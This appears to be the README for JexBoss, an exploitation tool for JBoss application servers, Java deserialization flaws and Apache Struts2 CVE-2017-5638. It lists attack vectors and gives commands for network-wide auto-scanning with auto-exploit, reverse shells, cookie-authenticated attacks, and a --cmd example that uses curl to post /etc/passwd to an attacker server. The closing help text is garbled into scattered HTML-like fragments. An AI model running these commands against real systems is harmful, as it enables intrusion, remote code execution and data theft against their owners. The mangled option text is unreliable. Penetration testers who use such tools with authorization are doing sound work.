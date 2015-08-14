JexBoss - Jboss (and Java Deserialization Vulnerabilities) verify and Exploitation Tool
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.
Requirements:
- Python >= 2.7.x
- urllib3
- ipaddress
Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:
git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080 OR: Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip unzip master.zip cd jexboss-master pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:
yum -y install centos-release-scl yum -y install python27 scl enable python27 bash
Installation on WindowsIf you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:
- Download and install Python
- Download and install Git for Windows
- After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\ PATH=$PATH:C:\Python27\Scripts git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080
Features:The tool and exploits were developed and tested for:
- JBoss Application Server versions: 3, 4, 5 and 6.
- Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
- /admin-console
- tested and working in JBoss versions 5 and 6
- /jmx-console
- tested and working in JBoss versions 4, 5 and 6
- /web-console/Invoker
- tested and working in JBoss versions 4, 5 and 6
- /invoker/JMXInvokerServlet
- tested and working in JBoss versions 4, 5 and 6
- Application Deserialization
- tested and working against multiple Java applications, platforms, etc, via HTTP POST Parameters
- Servlet Deserialization
- tested and working against multiple Java applications, platforms, etc, via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
- Apache Struts2 CVE-2017-5638
- tested in Apache Struts 2 applications
- Others
Videos:
- Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
- Exploiting JBoss Application Server with JexBoss
- Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)
Screenshots:
- Simple usage examples:
$ python jexboss.py
- Example of standalone mode against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080
- Usage modes:
$ python jexboss.py -h
- Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
- Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
- Results and recommendations:
Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:
jexremote=YOUR_IP:YOUR_PORT Example: Shell>jexremote=192.168.0.10:4444
- Example:
When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.
Usage Examples:
- For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
- For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
- For Java Deserialization Vulnerabilities in a Servlet (like Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
- For Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
- For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
- Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
- File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
- More Options:
optional arguments: -h, --help show this help message and exit --version show program's version number and exit --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!) --disable-check-updates, -D Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt -mode {standalone,auto-scan,file-scan} Operation mode (DEFAULT: standalone) --app-unserialize, -j Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc) --servlet-unserialize, -l Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces) --jboss Check only for JBOSS vectors. --jenkins Check only for Jenkins CLI vector. --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default. --proxy PROXY, -P PROXY Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128) --proxy-cred LOGIN:PASS, -L LOGIN:PASS Proxy authentication credentials (eg -L name:password) --jboss-login LOGIN:PASS, -J LOGIN:PASS JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin) --timeout TIMEOUT Seconds to wait before timeout connection (default 3) Standalone mode: -host HOST, -u HOST Host address to be checked (eg. -u http://192.168.0.10:8080) Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER): --reverse-host RHOST:RPORT, -r RHOST:RPORT Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331) --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server) --windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe) --post-parameter PARAMETER, -H PARAMETER Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- --force="" --gadget="" --load-gadget="" --show-payload="" -f="" -file="" -network="" -out="" -ports="" -results="" -t="" -u="" 10.0.0.0="" 8080="" a="" and="" auto="" automatically.="" base64="" be="" by="" checked="" cidr="" commas="" commons-collections3.1="" commons-collections4.0="" content-types.="" different="" each="" eg.="" file="" filename="" filename_hosts="" filename_results="" for="" force="" format="" formats="" from="" gadget="" gadgets="" generate="" generated="" groovy1="" gziped="" hi="" host="" in="" informed="" java="" javax.faces.viewstate="" jenkins="" line="" list="" mode:="" mode="" multiple="" name="" network="" object="" of="" one="" or="" others="" own="" parameter.="" payload.="" payload="" paypal="X)" per="" ports="" pre="" print="" provide="" raw="" results="" scan="" scanned="" send="" separated="" serialized="" specify="" store="" the="" this="" to="" type="" url="" will="" with="" your="">
